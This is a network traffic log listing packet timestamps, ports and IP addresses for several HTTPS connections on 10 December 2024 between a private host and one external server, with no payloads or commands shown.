Dec 10, 2024 08:57:21.441099882 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.441181898 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.444806099 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.444885969 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.447694063 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.447757006 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.450856924 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.450912952 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.453660965 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.453737974 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.457448006 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.457515001 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.459984064 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.460046053 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.463774920 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.463844061 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.466717958 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.466790915 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.469762087 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.469834089 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.473539114 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.473606110 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.476695061 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.476758003 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.479615927 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.479690075 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.629118919 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.629201889 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.633013964 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.633081913 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.635937929 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.635998964 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.638859987 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.638948917 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.641953945 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.642016888 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.645653963 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.645725965 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.648610115 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.648683071 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.651592016 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.651663065 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.655419111 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.655514956 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.657959938 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.658030987 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.661725998 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.661801100 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.664674997 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.664747000 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.667789936 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.667867899 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.670702934 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.670774937 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.674460888 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.674540043 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.677457094 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.677556992 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.814158916 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.814241886 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.817450047 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.817528963 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.820342064 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.820430040 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.823321104 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.823401928 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.826225996 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.826292992 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.830106974 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.830245018 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.832992077 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.833081007 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.836093903 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.836189032 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.838972092 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.839041948 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.842729092 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.842823029 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.845824003 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.845921993 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.848790884 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.848879099 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.852231026 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.852302074 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.855047941 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.855110884 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.858886957 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.858966112 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.861773014 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.861836910 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.864835024 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.864897966 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.008172035 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.008243084 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.011040926 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.011104107 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.014883041 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.014949083 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.017792940 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.017872095 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.020874023 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.020937920 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.023866892 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.023936987 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.027637005 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.027700901 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.030911922 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.030981064 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.033592939 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.033664942 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.037344933 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.037416935 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.040421009 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.040488005 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.043765068 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.043840885 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.046633959 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.046705961 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.049768925 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.049839020 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.052572012 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.052634954 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.056427002 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.056490898 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.198847055 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.198928118 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.202742100 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.202908993 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.205625057 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.205687046 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.208781004 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.208849907 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.212424994 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.212507010 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.215390921 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.215447903 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.218434095 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.218503952 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.220367908 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.220421076 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.220427990 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.220465899 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.220534086 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.220570087 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.284113884 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.526632071 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.526645899 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.737087965 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.737114906 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:22.737184048 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.737570047 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:22.737582922 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:24.090784073 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:24.090903044 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:24.091476917 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:24.091485023 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:24.091651917 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:24.091655970 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:24.601273060 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:24.601294994 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:24.601366043 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:24.601381063 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:24.601418972 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:24.793128014 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:24.793263912 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:24.817231894 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:24.817327976 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:24.850692034 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:24.850811958 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:24.875937939 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:24.876157045 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:24.993321896 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:24.993455887 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:25.008251905 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:25.008471012 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:25.027120113 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:25.027189016 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:25.027235985 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:25.027266026 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:25.027937889 CET	49710	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:25.027946949 CET	443	49710	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:25.106463909 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:25.106501102 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:25.106565952 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:25.106924057 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:25.106939077 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:26.461050987 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:26.461169958 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:26.461736917 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:26.461745977 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:26.461944103 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:26.461949110 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:26.969084024 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:26.969104052 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:26.969172001 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:26.969188929 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:26.969202995 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:26.969230890 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.163258076 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.163394928 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.188370943 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.188472986 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.213401079 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.213476896 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.246973038 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.247189999 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.361054897 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.361193895 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.375852108 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.375921011 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.394901991 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.395075083 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.409238100 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.409318924 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.420283079 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.420365095 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.431241989 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.431360960 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.549263000 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.549380064 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.557739019 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.557821035 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.568842888 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.568926096 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.576651096 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.576736927 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.584907055 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.585006952 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.595899105 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.596008062 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.603626013 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.603724957 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.611938000 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.612055063 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.620503902 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.620583057 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.629497051 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.629616022 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.741146088 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.741260052 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.747251034 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.747364044 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.755640030 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.755742073 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.762070894 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.762192011 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.769143105 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.769287109 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.776885986 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.776992083 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.783225060 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.783354998 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.790369987 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.790476084 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.795854092 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.795943022 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.802810907 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.802903891 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.809740067 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.809813976 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.817851067 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.817945957 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.824163914 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.824239969 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.830380917 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.830456018 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.838675022 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.838742971 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.845174074 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.845259905 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.930310011 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.930386066 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.937113047 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.937201023 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.942065954 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.942150116 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.946947098 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.947016954 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.953053951 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.953176975 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.957592964 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.957645893 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.962023020 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.962100029 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.966353893 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.966428995 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.971920013 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.972011089 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.975490093 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.975564957 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.980918884 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.980982065 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.985202074 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.985274076 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.989387989 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.989479065 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.994848013 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.994940042 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:27.999058962 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:27.999126911 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.003305912 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.003386974 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.121608019 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.121789932 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.125165939 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.125273943 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.128346920 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.128439903 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.131515980 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.131611109 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.134675026 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.134816885 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.138734102 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.138820887 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.142008066 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.142095089 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.145066023 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.145144939 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.149161100 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.149249077 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.152264118 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.152329922 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.155921936 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.155987978 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.159049988 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.159123898 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.162307978 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.162384033 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.166326046 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.166388035 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.169517040 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.169580936 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.172712088 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.172775984 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.175792933 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.175870895 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.316148996 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.316322088 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.319205999 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.319297075 CET	49712	443	192.168.2.6	23.254.224.41
